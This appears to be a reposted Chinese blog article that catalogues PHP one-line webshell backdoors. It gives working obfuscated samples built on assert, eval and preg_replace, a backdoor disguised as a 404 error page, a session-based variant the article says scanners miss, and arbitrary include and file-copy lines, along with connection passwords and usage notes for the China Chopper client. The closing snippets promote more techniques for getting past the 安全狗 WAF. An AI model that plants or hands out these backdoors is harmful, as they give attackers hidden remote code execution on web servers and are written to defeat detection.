那些强悍的PHP一句话后门

强悍的PHP一句话后门

常用一:

<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]);

$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);

?>

所以连起来就是

assert(${_POST}[4]);

密码就是4

常用二:

<?php

($b4dboy = $_POST[‘b4dboy‘]) && @preg_replace(‘/ad/e‘,‘@‘.str_rot13(‘riny‘).‘($b4dboy)‘, ‘add‘);

?>

使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果。

这类后门让网站、服务器管理员很是头疼经常要换着方法进行各种检测而很多新出现的编写技术用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404 Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

</body></html>

<?php

@preg_replace("/[pageerror]/e",$_POST[‘error‘],"saft");

header(‘HTTP/1.1 404 Not Found‘);

?>

404页面是网站常用的文件一般建议好后很少有人会去对它进行检查修改这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话

<?php

session_start();

$_POST[‘code‘] && $_SESSION[‘theCode‘] = trim($_POST[‘code‘]);

$_SESSION[‘theCode‘]&&preg_replace(‘\‘a\‘eis‘,‘e‘.‘v‘.‘a‘.‘l‘.‘(base64_decode($_SESSION[\‘theCode\‘]))‘,‘a‘);

将$_POST[‘code‘]的内容赋值给$_SESSION[‘theCode‘]然后执行$_SESSION[‘theCode‘]亮点是没有特征码。用扫描工具来检查代码的话是不会报警的达到目的了。

三个变形的一句话PHP木马

第一个

<?php ([email protected]$_GET[2])[email protected]$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

第二个

<?php

$_="";

$_[+""]=‘‘;

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${‘_‘.$_}[‘_‘](${‘_‘.$_}[‘__‘]);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST[‘pass‘]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽或者用其它注射工具也可以因为是post提交的。

第三个

($b4dboy = $_POST[‘b4dboy‘]) && @preg_replace(‘/ad/e‘,‘@‘.str_rot13(‘riny‘).‘($b4dboy)‘, ‘add‘);

str_rot13(‘riny’)即编码后的eval完全避开了关键字又不失效果让人吐血

最后列几个高级的PHP一句话木马后门

1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST[‘h‘],"Access");

//菜刀一句话

2、

$filename=$_GET[‘xbid‘];

include ($filename);

//危险的include函数直接编译任何文件为php格式运行

3、

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST[‘h‘],"Access");

//菜刀一句话

5、

include ($uid);

//危险的include函数直接编译任何文件为php格式运行POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif

//gif插一句话

6、

典型一句话

程序后门代码

<?php eval_r($_POST[sb])?>

程序代码

<?php @eval_r($_POST[sb])?>

//容错代码

程序代码

<?php assert($_POST[sb]);?>

//使用lanker一句话客户端的专家模式执行相关的php语句

程序代码

<?$_POST[‘sa‘]($_POST[‘sb‘]);?>

程序代码

<?$_POST[‘sa‘]($_POST[‘sb‘],$_POST[‘sc‘])?>

程序代码

<?php

@preg_replace("/[email]/e",$_POST[‘h‘],"error");

?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入

程序代码

<O>[email protected]_r($_POST1);</O>

程序代码

<script language="php">@eval_r($_POST[sb])</script>

//绕过<?限制的一句话

综上这些PHP一句话后门可谓五脏俱全一不小心您肯定中招了。

时间: 2024-08-09 06:19:13

那些强悍的PHP一句话后门的相关文章

强悍的PHP一句话后门 -更多请收藏本站 欢迎阅读

这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 01 02 03 04 05 06 07 08 09 10 11 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found<

强大的PHP一句话后门

强悍的PHP一句话后门  这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的. 今天我们细数一些有意思的PHP一句话木马. 1.利用404页面隐藏PHP小马:  1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 2 <html><head> 3 <title>404 Not Found</title>

一个一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

一个神秘的PHP一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

一个神秘的一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

表弟让整理的各种一句话后门= =

php 利用404页面隐藏PHP小马 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this se

php一句话后门过狗姿势万千之传输层加工【三】

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a

php一句话后门过狗姿势万千之后门构造与隐藏【二】

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

PHP一句话后门过狗姿势万千之传输层加工

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a